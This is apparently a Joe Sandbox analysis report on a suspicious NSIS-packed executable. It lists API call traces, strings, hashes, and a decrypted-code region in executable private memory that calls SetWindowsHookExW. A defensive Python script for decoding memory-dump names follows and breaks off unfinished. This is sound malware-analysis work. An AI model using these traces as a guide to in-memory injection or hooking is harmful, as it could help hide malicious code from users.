• GlobalFree.KERNEL32(00000000), ref: 703D1664
Memory Dump Source
• Source File: 00000000.00000002.1598887120.00000000703D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 703D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_703d0000_yVVZdG2NJX.jbxd
Similarity
• API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
• String ID:
• API String ID: 1148316912-0
APIs
• GetDlgItem.USER32(?,?), ref: 00401D63
• GetClientRect.USER32(00000000,?), ref: 00401D70
• LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
• SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
• DeleteObject.GDI32(00000000), ref: 00401DAE
Memory Dump Source
• Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
APIs
• SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
• SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: MessageSend$Timeout
• String ID: !
• API String ID: 1777923405-2657877971
APIs
• lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
• wsprintfW.USER32 ref: 00404B65
• SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
Strings
Memory Dump Source
• Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                      • String ID: %u.%u%s%s
                                                                      • API String ID: 3540041739-3551169577
                                                                      • Opcode ID: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
                                                                      • Instruction ID: c6a8333de7f2a0e63f9e82a7fb0d3590b97a2c0368f8d4fe0eecd184368e2ceb
                                                                      • Opcode Fuzzy Hash: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
                                                                      • Instruction Fuzzy Hash: 5711DB736041282BDB00656D9C41F9E329CDB86334F15423BFB25F21D1D978DC1186E8
                                                                      APIs
                                                                      • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,?,?,774D3420,004059C9,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405C25
                                                                      • CharNextW.USER32(00000000), ref: 00405C2A
                                                                      • CharNextW.USER32(00000000), ref: 00405C42
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\nsg9061.tmp, xrefs: 00405C18
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsg9061.tmp
                                                                      • API String ID: 3213498283-677182141
                                                                      • Opcode ID: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                      • Instruction ID: 6a9d977fbe5713998eb834b7ad01fe533960ca492682b5c2b36711c34b001c28
                                                                      • Opcode Fuzzy Hash: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                      • Instruction Fuzzy Hash: DDF0F061808B1095FB3176644C88E7B66BCEB55360B04803BE641B72C0D3B84DC18EAA
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 00405B72
                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 00405B7C
                                                                      • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B8E
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 2659869361-2145255484
                                                                      • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                      • Instruction ID: 803477e47080facc391f0cecd2807ccdb00b9d1fdb40608b9d44cb66137c19bb
                                                                      • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                      • Instruction Fuzzy Hash: 3BD0A731501A30AAC111BB449D04DDF72ACDE45304342047FF101B31A2C7BC2D5287FD
                                                                      APIs
                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Close$Enum
                                                                      • String ID:
                                                                      • API String ID: 464197530-0
                                                                      • Opcode ID: 1341f91fd8d518b2ca140e0133bcf02bd0ea54a7f691716fe820626e10176459
                                                                      • Instruction ID: 4ebe2cb43181949e29f1e9fb79ae388d5d3e17bd3db4e8cfc4c1202d027f6d8e
                                                                      • Opcode Fuzzy Hash: 1341f91fd8d518b2ca140e0133bcf02bd0ea54a7f691716fe820626e10176459
                                                                      • Instruction Fuzzy Hash: FB116A32500108FBDF02AB90CE49FEE7B7DAF44340F110076B905B51E1E7B59E21AB58
                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000,00000000,00403059,?,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                      • GetTickCount.KERNEL32 ref: 00402EAA
                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                      • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                      • String ID:
                                                                      • API String ID: 2102729457-0
                                                                      • Opcode ID: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                      • Instruction ID: b514363a92e965461d88eaa206c20d0702a544c8e4880045d1c7c79aac8a479e
                                                                      • Opcode Fuzzy Hash: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                      • Instruction Fuzzy Hash: 3AF05E30966A21EBC6606B24FE8CA8B7B64FB44B01711887BF001B11B4DA7C4892CBDC
                                                                      APIs
                                                                        • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                        • Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,?,?,774D3420,004059C9,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405C25
                                                                        • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
                                                                        • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg9061.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,?,?,774D3420,004059C9,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405CCD
                                                                      • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,?,?,774D3420,004059C9,?,C:\Users\user\AppData\Local\Temp\,774D3420), ref: 00405CDD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsg9061.tmp
                                                                      • API String ID: 3248276644-677182141
                                                                      • Opcode ID: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
                                                                      • Instruction ID: 850bfc7ffc9f89e8bebb6f59b63454ed566b5c4d810398842941662e03732b0e
                                                                      • Opcode Fuzzy Hash: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
                                                                      • Instruction Fuzzy Hash: 82F0D625019F5216F622363A4D09AAF1954CE82364B0A013FF891722C1DB3C8942DD6E
                                                                      APIs
                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,007A0F00,00000000,?,?,Call,?,?,004063D9,80000002), ref: 004061AB
                                                                      • RegCloseKey.ADVAPI32(?,?,004063D9,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F00), ref: 004061B6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CloseQueryValue
                                                                      • String ID: Call
                                                                      • API String ID: 3356406503-1824292864
                                                                      • Opcode ID: e86e6fd2e5cb5672620ff5ab575da48d8fe54f653cf1da9627cee5843be69ab4
                                                                      • Instruction ID: f8c60df0673843c4a96ed35a73ceba2ba355a7ad566f59c539dda5576aee505e
                                                                      • Opcode Fuzzy Hash: e86e6fd2e5cb5672620ff5ab575da48d8fe54f653cf1da9627cee5843be69ab4
                                                                      • Instruction Fuzzy Hash: B301BC72500219EADF21CF50CC09EDB3BA8EB04360F01803AFD16A6191E778D964CBA4
                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
                                                                      • CloseHandle.KERNEL32(?), ref: 004058B6
                                                                      Strings
                                                                      • Error launching installer, xrefs: 00405893
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateHandleProcess
                                                                      • String ID: Error launching installer
                                                                      • API String ID: 3712363035-66219284
                                                                      • Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                      • Instruction ID: b039bfc1fd8153a77b97507ee8e8b42fe9752dbefc529c56e43fdfa491991b30
                                                                      • Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                      • Instruction Fuzzy Hash: 6CE0B6F5600209BFFB00AF64ED09E7B7BACEB58605F058525BD51F2290D6B998148A78
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,774D3420,004038CA,004036E0,00000006,?,00000006,00000008,0000000A), ref: 0040390C
                                                                      • GlobalFree.KERNEL32(008BD968), ref: 00403913
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403904
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Free$GlobalLibrary
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 1100898210-2145255484
                                                                      • Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                      • Instruction ID: 827a6d7c30b52d61f5a2dbff04e35f254d4b7381da6d9dc608e34789494937b8
                                                                      • Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                      • Instruction Fuzzy Hash: 58E0CD334010205BC6115F04FE0475A77685F45B22F16003BFC807717147B41C538BC8
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\yVVZdG2NJX.exe,C:\Users\user\Desktop\yVVZdG2NJX.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBE
                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\yVVZdG2NJX.exe,C:\Users\user\Desktop\yVVZdG2NJX.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BCE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrlen
                                                                      • String ID: C:\Users\user\Desktop
                                                                      • API String ID: 2709904686-3080008178
                                                                      • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                      • Instruction ID: d1e11866c06308db2688671cfe2e39cf8e5f3b64411c1caee3e249c785e2e979
                                                                      • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                      • Instruction Fuzzy Hash: BDD05EB34109209AC3126B08DC00D9F77BCEF11301746486AF440A6161D7786C8186AD
                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 703D116A
                                                                      • GlobalFree.KERNEL32(00000000), ref: 703D11C7
                                                                      • GlobalFree.KERNEL32(00000000), ref: 703D11D9
                                                                      • GlobalFree.KERNEL32(?), ref: 703D1203
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1598887120.00000000703D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 703D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1598873256.00000000703D0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000000.00000002.1598903143.00000000703D3000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000000.00000002.1598921247.00000000703D5000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_703d0000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 1780285237-0
                                                                      • Opcode ID: de836c488b918c3f4c84ce14903bbf078a220f202f4c70e9a45e18cbdfc6d66b
                                                                      • Instruction ID: ced68df7799f78560342c5778d33f9f4460dc23e5f6f4ae7fa7c864e338a6cce
                                                                      • Opcode Fuzzy Hash: de836c488b918c3f4c84ce14903bbf078a220f202f4c70e9a45e18cbdfc6d66b
                                                                      • Instruction Fuzzy Hash: 3B318EB3500205BFE3008F75ED46A2EB7FDEB45310B21456AFA46D7324E779E9018B21
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D1A
                                                                      • CharNextA.USER32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D2B
                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 190613189-0
                                                                      • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                      • Instruction ID: 076f441daad098c1e87a0755c7bbd60db18a276d6ce73f7d9d897af98e652dc6
                                                                      • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                      • Instruction Fuzzy Hash: E5F0F631204918FFC7129FA4DD0499FBBB8EF06354B2580BAE840FB211D674DE01AFA8

                                                                      Execution Graph

                                                                      Execution Coverage:11.3%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:90
                                                                      Total number of Limit Nodes:8
                                                                      execution_graph (the node/edge list is data for the report viewer's graph widget; only the root nodes and the API calls reachable from each, as recorded in that data, are kept here)
                                                                      • 15b1c0 → GetCurrentProcess → GetCurrentThread → GetCurrentProcess → GetCurrentThreadId
                                                                      • 15ba20 → 15b004 → 3789be90 / 3789bea0 → PeekMessageW (via 3789adb0) and WaitMessage (via 3789c368), looping back until 3789bf52
                                                                      • ad0fc → 37896ad8 / 37896b70 / 37893a5c / 37897d58 / 37896ae8 → CallWindowProcW (via 37893a5c, 378979bc, 3789965a, 37897ee0, 37897ef0, 37897fbc, 37897f98, 37897fa8, 37899380)
                                                                      • 37896930 → CreateWindowExW
                                                                      • 15b408 → DuplicateHandle
                                                                      • 156308 → SetWindowsHookExW
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0P$0P$0P$0P$0P
                                                                      • API String ID: 0-2254592918
                                                                      • Opcode ID: 1d0a54cc636c6195436a9537f304fdb06e935bd667188b6cc850be7c6bf16be3
                                                                      • Instruction ID: ad42171f7c06ff38ee411ed48089d7944909ac1da6f66f01fc27c7b8e1eda0ea
                                                                      • Opcode Fuzzy Hash: 1d0a54cc636c6195436a9537f304fdb06e935bd667188b6cc850be7c6bf16be3
                                                                      • Instruction Fuzzy Hash: EF126D74B002189FEB14DF69C854BAEBBF6FF89300F248569E455AB391DB349D41CB90
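                                                                      The .sdmp names in the Memory Dump Source entries above carry the region's base address, page protection and memory type, and those two columns are what separate the two kinds of code this section shows. Process 0's regions at 0x400000 (the submitted executable; its "Error launching installer" and "[Rename]" strings are the ones the NSIS installer stub uses) and at 0x703D0000 (a DLL) have protection 00000020/00000004/00000002 and type 01000000, i.e. image mappings. The process 3 region at 0x36910000 is "based on PE: false" with protection 00000040 and type 00020000: writable and executable private memory that no module on disk backs, which is consistent with the Dynamic/Decrypted Code Coverage figure in the Execution Graph header. The script below is an added example, not part of the Joe Sandbox report and not Joe Security's code. It parses the names exactly as they appear on this page, decodes the protection and type columns with the winnt.h constants, and flags executable non-image regions as the dumps to pull first. The column layout, the reading of column 5 as MEMORY_BASIC_INFORMATION.Protect and column 7 as its Type, and the reading of the last column as a module reference are assumptions (every name on this page is consistent with them); column 6 is left undecoded because the page does not define it.

```python
"""Decode the Joe Sandbox memory-dump (.sdmp) names listed in this report.

Added example; not part of the Joe Sandbox report and not Joe Security code.
Assumed name layout, inferred from the names on this page:
  <pid>.<round>.<dump id>.<base address>.<protect>.<field 6>.<type>.<module ref>.sdmp
Columns 5 and 7 are decoded as MEMORY_BASIC_INFORMATION.Protect / .Type using the
winnt.h constants (an assumption that every name on this page is consistent with);
field 6 and the module reference are kept raw because the page does not define them.
"""
import re
from dataclasses import dataclass

# Page-protection constants from winnt.h
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTE_MASK = 0xF0  # any PAGE_EXECUTE* value
WRITE_MASK = 0xCC    # PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

# MEMORY_BASIC_INFORMATION.Type values from winnt.h
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000
MEM_TYPE = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

_HEX8 = r"([0-9A-Fa-f]{8})"
_NAME = re.compile(
    rf"^{_HEX8}\.{_HEX8}\.(\d+)\.([0-9A-Fa-f]{{16}})\.{_HEX8}\.{_HEX8}\.{_HEX8}\.{_HEX8}\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
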